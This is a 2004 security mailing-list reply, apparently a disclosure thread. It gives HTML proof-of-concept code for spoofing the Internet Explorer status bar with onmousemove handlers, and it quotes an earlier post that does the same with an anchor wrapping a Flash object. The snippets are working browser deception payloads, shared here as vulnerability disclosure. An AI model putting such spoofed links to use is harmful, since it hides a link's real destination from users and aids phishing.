I thought this was obvious, but having seen the amount of discussion, here's another URL spoofer: <a href="http://www.google.com"; onmousemove="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> note that <a href="http://www.google.com"; onmouseover="window.status='http://www.msn.com';" onmouseout="window.status='Done.';">Visit Msn!</a> won't work - it seems MS have already half fixed this.... (tested on MSIE 6.0, winXP) On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi <roozbeh_afrasiabi@xxxxxxxxx> wrote: > In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer> > > Here is another way of spoofing the status bar: > > <a> tag + <object> tag > > <!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" > > codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"; > > WIDTH="300" HEIGHT="50" id="link" ALIGN=""> > > <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu > > VALU=FALSE> > > <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN="" > > TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer";></EMBED> > > </a></OBJECT></a> > > *this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page uses flash to generate > > random urls. > > demo: > > http://www.persiax.com/pocs/statusbar/status.htm > > -- PHP, mySQL Security and more at http://www.puremango.co.uk
